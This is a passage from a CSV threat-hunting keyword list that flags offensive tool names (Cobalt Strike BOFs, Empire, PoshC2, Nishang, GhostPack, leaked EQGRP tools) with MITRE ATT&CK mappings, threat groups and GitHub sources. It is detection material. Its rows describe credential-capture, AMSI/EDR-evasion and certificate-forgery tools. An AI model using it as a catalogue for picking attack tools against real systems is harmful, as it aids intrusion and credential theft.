T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/G0ldenGunSec/GetWebDAVStatus,1,1,N/A,10,10,81,18,2021-09-29T17:40:52Z,2021-09-29T17:31:21Z -*GetWebDAVStatus_DotNet*,offensive_tool_keyword,cobaltstrike,Determine if the WebClient Service (WebDAV) is running on a remote system,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/G0ldenGunSec/GetWebDAVStatus,1,1,N/A,10,10,81,18,2021-09-29T17:40:52Z,2021-09-29T17:31:21Z -*GetWebDAVStatus_x64.o*,offensive_tool_keyword,cobaltstrike,Determine if the WebClient Service (WebDAV) is running on a remote system,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/G0ldenGunSec/GetWebDAVStatus,1,1,N/A,10,10,81,18,2021-09-29T17:40:52Z,2021-09-29T17:31:21Z -*GetWhoamiCommand*,offensive_tool_keyword,C2 related tools,PowerShell rebuilt in C# for Red Teaming purposes,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider,C2,https://github.com/bitsadmin/nopowershell,1,1,N/A,10,10,761,126,2021-06-17T12:36:05Z,2018-11-28T21:07:51Z -*GetWhoamiCommand.cs*,offensive_tool_keyword,nopowershell,NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.,T1059 - T1086 - T1500 - T1564 - T1127 - T1027,TA0002 - TA0003 - TA0005,N/A,N/A,Defense Evasion,https://github.com/bitsadmin/nopowershell,1,0,N/A,10,10,761,126,2021-06-17T12:36:05Z,2018-11-28T21:07:51Z -*GetWindowsCredentials.exe*,offensive_tool_keyword,viperc2,vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/FunnyWolf/vipermsf,1,1,N/A,N/A,1,78,37,2023-09-28T08:36:47Z,2021-01-20T13:08:24Z -*Get-Wlan-Keys*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*Get-WLAN-Keys*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*Get-WLAN-Keys.ps1*,offensive_tool_keyword,chimera,Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.,T1027.002 - T1059.001 - T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/tokyoneon/Chimera/,1,1,N/A,10,10,1187,225,2021-11-09T12:39:59Z,2020-09-01T07:42:22Z -*getwmiregcachedrdpconnection*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Aggressor script menu for Powerview/SharpView,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tevora-threat/PowerView3-Aggressor,1,1,N/A,10,10,125,39,2018-07-24T21:52:03Z,2018-07-24T21:16:10Z -*Get-WMIRegCachedRDPConnection*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Aggressor script menu for Powerview/SharpView,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tevora-threat/PowerView3-Aggressor,1,1,N/A,10,10,125,39,2018-07-24T21:52:03Z,2018-07-24T21:16:10Z -*Get-WMIRegCachedRDPConnection*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,powerview.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*get-wmiregcachedrdpconnection*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*getwmireglastloggedon*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Aggressor script menu for Powerview/SharpView,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tevora-threat/PowerView3-Aggressor,1,1,N/A,10,10,125,39,2018-07-24T21:52:03Z,2018-07-24T21:16:10Z -*Get-WMIRegLastLoggedOn*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Aggressor script menu for Powerview/SharpView,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tevora-threat/PowerView3-Aggressor,1,1,N/A,10,10,125,39,2018-07-24T21:52:03Z,2018-07-24T21:16:10Z -*Get-WMIRegLastLoggedOn*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,powerview.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*get-wmireglastloggedon*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Get-WMIRegMountedDrive*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,powerview.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*get-wmiregmounteddrive*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Get-WorkingHours*,offensive_tool_keyword,empire,empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1052,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*gexplorer.exe*,offensive_tool_keyword,cobaltstrike,A protective and Low Level Shellcode Loader that defeats modern EDR systems.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/cribdragg3r/Alaris,1,1,N/A,10,10,846,136,2021-11-01T05:00:43Z,2020-02-22T15:42:37Z -*ggackgngljinccllcmbgnpgpllcjepgc*,greyware_tool_keyword,WindmillVPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*ghost_* -v*,offensive_tool_keyword,EQGRP tools,Equation Group hack tool leaked by ShadowBrokers- file ghost:statmon/tooltalk privesc,T1053 - T1064 - T1059 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/x0rz/EQGRP/tree/master/Linux/bin,1,0,N/A,N/A,10,4011,2166,2017-05-24T21:12:59Z,2017-04-08T14:03:59Z -*ghost_sparc*,offensive_tool_keyword,EQGRP tools,Equation Group hack tool leaked by ShadowBrokers- file ghost:statmon/tooltalk privesc,T1053 - T1064 - T1059 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/x0rz/EQGRP/tree/master/Linux/bin,1,0,N/A,N/A,10,4011,2166,2017-05-24T21:12:59Z,2017-04-08T14:03:59Z -*ghost_x86*,offensive_tool_keyword,EQGRP tools,Equation Group hack tool leaked by ShadowBrokers- file ghost:statmon/tooltalk privesc,T1053 - T1064 - T1059 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/x0rz/EQGRP/tree/master/Linux/bin,1,0,N/A,N/A,10,4011,2166,2017-05-24T21:12:59Z,2017-04-08T14:03:59Z -*ghost01.hwtxt*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*GhostInTheNet off*,offensive_tool_keyword,GhostInTheNet,Ultimate Network Stealther that makes Linux a Ghost In The Net and protects from MITM/DOS/scan,T1574 - T1565 - T1055,TA0007 - TA0040 - TA0043,N/A,N/A,Sniffing & Spoofing,https://github.com/cryptolok/GhostInTheNet,1,0,N/A,7,4,359,85,2023-04-27T07:07:29Z,2017-04-22T01:53:16Z -*GhostInTheNet on*,offensive_tool_keyword,GhostInTheNet,Ultimate Network Stealther that makes Linux a Ghost In The Net and protects from MITM/DOS/scan,T1574 - T1565 - T1055,TA0007 - TA0040 - TA0043,N/A,N/A,Sniffing & Spoofing,https://github.com/cryptolok/GhostInTheNet,1,0,N/A,7,4,359,85,2023-04-27T07:07:29Z,2017-04-22T01:53:16Z -*GhostInTheNet.sh *,offensive_tool_keyword,GhostInTheNet,Ultimate Network Stealther that makes Linux a Ghost In The Net and protects from MITM/DOS/scan,T1574 - T1565 - T1055,TA0007 - TA0040 - TA0043,N/A,N/A,Sniffing & Spoofing,https://github.com/cryptolok/GhostInTheNet,1,1,N/A,7,4,359,85,2023-04-27T07:07:29Z,2017-04-22T01:53:16Z -*GhostPack*,offensive_tool_keyword,GhostPack,A collection of security related toolsets.with known hacktools,T1055 - T1203 - T1218 - T1560,TA0002 - TA0003 - TA0007,N/A,N/A,Exploitation tools,https://github.com/GhostPack,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*GhostPack/ForgeCert*,offensive_tool_keyword,ForgeCert,ForgeCert uses the BouncyCastle C# API and a stolen Certificate Authority (CA) certificate + private key to forge certificates for arbitrary users capable of authentication to Active Directory.,T1553.002 - T1136.003 - T1059.001,TA0006 - TA0002,N/A,N/A,Defense Evasion,https://github.com/GhostPack/ForgeCert,1,1,N/A,10,6,538,87,2022-10-07T18:18:09Z,2021-06-09T22:04:18Z -*GhostPack/Koh*,offensive_tool_keyword,cobaltstrike,Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/GhostPack/Koh,1,1,N/A,10,10,447,59,2022-07-13T23:41:38Z,2022-07-07T17:14:09Z 